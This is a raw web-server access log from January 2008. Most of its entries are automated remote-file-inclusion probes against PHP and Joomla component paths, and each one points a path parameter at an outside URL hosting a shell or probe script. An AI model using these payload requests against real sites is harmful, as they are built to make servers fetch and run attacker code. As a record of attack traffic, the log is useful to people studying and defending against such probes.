204.13.54.2 - - [30/Jan/2008:08:41:28 -0800] "GET /logs/include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:08:41:41 -0800] "GET /logs/access_071225.log/include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.77.182.148 - - [30/Jan/2008:08:42:06 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
222.77.182.148 - - [30/Jan/2008:08:42:07 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:08:42:32 -0800] "GET /logs/access_071229.log/include.php?path[docroot]=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:08:42:32 -0800] "GET /logs/include.php?path[docroot]=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:08:42:49 -0800] "GET /logs/access_071225.log/include.php?path[docroot]=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.190 - - [30/Jan/2008:08:42:56 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.21.63.146 - - [30/Jan/2008:08:43:21 -0800] "GET /logs//config.inc.php?path_escape=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
72.21.63.146 - - [30/Jan/2008:08:43:21 -0800] "GET //config.inc.php?path_escape=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
83.223.100.182 - - [30/Jan/2008:08:43:57 -0800] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:08:44:16 -0800] "GET /logs/access_071229.log/include.php?path[docroot]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:08:44:16 -0800] "GET /include.php?path[docroot]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:08:44:17 -0800] "GET /logs/include.php?path[docroot]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:08:44:33 -0800] "GET /logs/access_071225.log/include.php?path[docroot]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:08:44:34 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:08:44:35 -0800] "GET /logs/access_071225.log//hysteresis//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:08:44:35 -0800] "GET /logs//hysteresis//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:08:44:35 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:08:44:37 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.243.64.123 - - [30/Jan/2008:08:44:48 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
125.243.64.123 - - [30/Jan/2008:08:44:48 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
213.194.149.190 - - [30/Jan/2008:08:45:04 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.143.88 - - [30/Jan/2008:08:45:11 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.143.88 - - [30/Jan/2008:08:45:12 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.230.31 - - [30/Jan/2008:08:45:17 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.215 - - [30/Jan/2008:08:47:59 -0800] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.215 - - [30/Jan/2008:08:48:00 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:08:48:26 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:08:48:27 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:08:48:27 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:08:48:58 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:08:48:58 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:08:48:58 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:08:48:58 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:08:48:58 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:08:48:58 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.46.109 - - [30/Jan/2008:08:49:03 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.46.109 - - [30/Jan/2008:08:49:04 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.46.109 - - [30/Jan/2008:08:49:04 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.46.109 - - [30/Jan/2008:08:49:04 -0800] "GET /logs/access_071230.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.10.208.226 - - [30/Jan/2008:08:49:14 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.10.183.50 - - [30/Jan/2008:08:49:17 -0800] "GET /logs//photoalb/lib/static/header.php?set_menu=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
189.10.183.50 - - [30/Jan/2008:08:49:24 -0800] "GET //photoalb/lib/static/header.php?set_menu=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
190.48.240.200 - - [30/Jan/2008:08:49:28 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.google.com.ar/search?hl=es&q=presto%2Bestudio%2Bgame&btnG=Buscar&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/1.5.0.12 Alexa Toolbar" "www.dmulk.com"
190.48.240.200 - - [30/Jan/2008:08:49:29 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/1.5.0.12 Alexa Toolbar" "www.dmulk.com"
190.48.240.200 - - [30/Jan/2008:08:49:47 -0800] "GET / HTTP/1.1" 200 2962 "http://www.dmulk.com/presto/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/1.5.0.12 Alexa Toolbar" "www.dmulk.com"
190.48.240.200 - - [30/Jan/2008:08:49:53 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/1.5.0.12 Alexa Toolbar" "www.dmulk.com"
84.19.176.87 - - [30/Jan/2008:08:50:11 -0800] "GET /logs/access_080106.log///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.87 - - [30/Jan/2008:08:50:11 -0800] "GET ///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2963 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.87 - - [30/Jan/2008:08:50:12 -0800] "GET /logs///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 32404 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.134 - - [30/Jan/2008:08:51:59 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.134 - - [30/Jan/2008:08:52:00 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.158.128.138 - - [30/Jan/2008:08:52:10 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.158.128.138 - - [30/Jan/2008:08:52:10 -0800] "GET /index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.158.128.138 - - [30/Jan/2008:08:52:10 -0800] "GET /logs/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:52:14 -0800] "GET /logs/access_071230.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:52:15 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:52:15 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.86.232.194 - - [30/Jan/2008:08:52:24 -0800] "GET /logs/access_071225.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.71.212.3/www/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [30/Jan/2008:08:52:25 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.71.212.3/www/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [30/Jan/2008:08:52:25 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.71.212.3/www/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.33.2.131 - - [30/Jan/2008:08:52:39 -0800] "GET /index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.215 - - [30/Jan/2008:08:52:40 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [30/Jan/2008:08:53:33 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [30/Jan/2008:08:53:33 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [30/Jan/2008:08:53:33 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:08:53:38 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:08:53:38 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:08:53:38 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.10.2 - - [30/Jan/2008:08:53:49 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.geocities.com/chandramission/chandra.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [30/Jan/2008:08:54:10 -0800] "GET /logs/access_071230.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [30/Jan/2008:08:54:11 -0800] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.0.141.110 - - [30/Jan/2008:08:55:15 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [30/Jan/2008:08:55:16 -0800] "GET /index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [30/Jan/2008:08:55:16 -0800] "GET /logs/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:08:55:42 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.205.186.244 - - [30/Jan/2008:08:56:57 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
193.205.186.244 - - [30/Jan/2008:08:56:57 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
74.6.23.231 - - [30/Jan/2008:08:57:12 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:08:57:44 -0800] "GET /logs/access_071225.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:08:57:44 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:08:57:45 -0800] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.221.124.31 - - [30/Jan/2008:08:58:24 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.dv-media.co.uk//templates/php.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.221.124.31 - - [30/Jan/2008:08:58:24 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.dv-media.co.uk//templates/php.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.221.124.31 - - [30/Jan/2008:08:58:25 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.dv-media.co.uk//templates/php.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.221.124.31 - - [30/Jan/2008:08:58:25 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.dv-media.co.uk//templates/php.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.87 - - [30/Jan/2008:08:58:39 -0800] "GET ///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2963 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.10.2 - - [30/Jan/2008:08:59:42 -0800] "GET /logs/access_071224.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.geocities.com/chandramission/chandra.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.10.2 - - [30/Jan/2008:08:59:42 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.geocities.com/chandramission/chandra.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.187.106.174 - - [30/Jan/2008:09:00:27 -0800] "GET /logs/access_071229.log/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.tamilmedia.dk//cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
79.187.106.178 - - [30/Jan/2008:09:00:28 -0800] "GET /index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.tamilmedia.dk//cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
79.187.106.174 - - [30/Jan/2008:09:00:29 -0800] "GET /logs/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.tamilmedia.dk//cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:09:00:49 -0800] "GET /logs/access_080101.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.86.232.194 - - [30/Jan/2008:09:01:21 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.86.232.194 - - [30/Jan/2008:09:01:22 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:09:03:01 -0800] "GET /logs/access_080106.log//index.php?option=com_rsgallery&page=inline&catid=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:09:03:04 -0800] "GET //index.php?option=com_rsgallery&page=inline&catid=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:09:03:06 -0800] "GET /logs//index.php?option=com_rsgallery&page=inline&catid=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.204.17.137 - - [30/Jan/2008:09:03:59 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.204.17.137 - - [30/Jan/2008:09:03:59 -0800] "GET /index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.204.17.137 - - [30/Jan/2008:09:04:00 -0800] "GET /logs/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.204.230.31 - - [30/Jan/2008:09:04:47 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.204.230.31 - - [30/Jan/2008:09:04:47 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.206.51 - - [30/Jan/2008:09:05:51 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
83.149.69.97 - - [30/Jan/2008:09:07:36 -0800] "GET /include.php?path[docroot]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.162.234 - - [30/Jan/2008:09:07:47 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.203 - - [30/Jan/2008:09:08:44 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.47.202.20 - - [30/Jan/2008:09:09:10 -0800] "GET /logs//sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
72.47.202.20 - - [30/Jan/2008:09:09:15 -0800] "GET //sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
